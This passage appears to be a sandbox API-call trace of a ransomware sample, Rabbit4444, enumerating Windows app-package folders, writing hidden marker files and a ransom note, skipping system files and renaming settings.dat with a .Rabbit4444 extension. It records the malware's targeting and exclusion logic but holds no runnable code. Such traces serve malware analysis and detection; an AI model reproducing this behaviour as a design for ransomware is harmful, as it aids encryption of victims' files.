lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2592721, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeddfc3e6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.334] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.334] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.334] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.334] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.335] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.335] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeddfc3e6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeddfc3e6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xede21687, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.335] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.335] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.335] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeddfc3e6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeddfc3e6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xede21687, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.335] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0061.335] lstrcpyW (in: lpString1=0x130ebde, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.335] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.335] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.335] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.336] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.336] CloseHandle (hObject=0x2a0) returned 1 [0061.336] CloseHandle (hObject=0x27c) returned 1 [0061.336] GetCurrentThreadId () returned 0xd98 [0061.336] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221c8 [0061.336] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData" [0061.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124028 | out: hHeap=0xe0000) returned 1 [0061.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221c0 | out: hHeap=0xe0000) returned 1 [0061.336] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData" [0061.336] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\" [0061.336] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0061.336] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.338] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.340] FlushFileBuffers (hFile=0x27c) returned 1 [0061.341] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.341] CloseHandle (hObject=0x27c) returned 1 [0061.341] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData") returned 86 [0061.341] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.342] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9120e63a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9120e63a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xede21687, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0061.342] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.342] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.342] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.342] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.342] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9120e63a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9120e63a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xede21687, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.342] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.342] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.342] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.342] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.342] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.342] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xede21687, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xede21687, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xede21687, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.342] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.342] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.342] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xede21687, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xede21687, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xede21687, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.342] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0061.342] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.342] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.343] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.343] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.343] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.343] CloseHandle (hObject=0x2a0) returned 1 [0061.343] CloseHandle (hObject=0x27c) returned 1 [0061.343] GetCurrentThreadId () returned 0xd98 [0061.343] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0061.343] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings" [0061.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118b28 | out: hHeap=0xe0000) returned 1 [0061.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0061.344] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings" [0061.344] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\" [0061.344] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0061.344] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.347] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.349] FlushFileBuffers (hFile=0x27c) returned 1 [0061.350] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.350] CloseHandle (hObject=0x27c) returned 1 [0061.351] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings") returned 81 [0061.351] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.351] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713b1523, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xede4785d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0061.351] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.351] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.351] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.351] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.351] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713b1523, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xede4785d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.351] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.351] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.351] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.351] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.351] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.351] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xede4785d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xede4785d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xede4785d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.351] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.351] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.351] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xfac02fce, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xfac02fce, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0061.352] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0061.352] lstrcpyW (in: lpString1=0x130ebdc, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0061.352] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0061.353] lstrlenW (lpString="roaming.lock") returned 12 [0061.353] lstrlenW (lpString="Rabbit4444") returned 10 [0061.353] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0061.353] lstrlenW (lpString=".dll") returned 4 [0061.353] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0061.353] lstrlenW (lpString=".lnk") returned 4 [0061.353] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0061.353] lstrlenW (lpString=".ini") returned 4 [0061.353] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0061.353] lstrlenW (lpString=".sys") returned 4 [0061.353] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0061.353] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfac02fce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x9120e63a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0061.353] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0061.353] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0061.353] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0061.354] lstrlenW (lpString="settings.dat") returned 12 [0061.354] lstrlenW (lpString="Rabbit4444") returned 10 [0061.354] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0061.354] lstrlenW (lpString=".dll") returned 4 [0061.354] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0061.354] lstrlenW (lpString=".lnk") returned 4 [0061.354] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0061.354] lstrlenW (lpString=".ini") returned 4 [0061.354] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0061.354] lstrlenW (lpString=".sys") returned 4 [0061.354] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0061.354] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.355] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0061.355] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15266534568) returned 1 [0061.355] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0061.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0061.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0061.355] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x29c [0061.356] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0061.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0061.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0061.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0061.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0061.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0061.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0061.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0061.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0061.358] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15266895151) returned 1 [0061.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0061.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0061.358] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.358] CloseHandle (hObject=0x29c) returned 1 [0061.359] CloseHandle (hObject=0x2a0) returned 1 [0061.359] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 105 [0061.359] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0061.359] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5757cb5f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x5757cb5f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x5757cb5f, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0061.359] 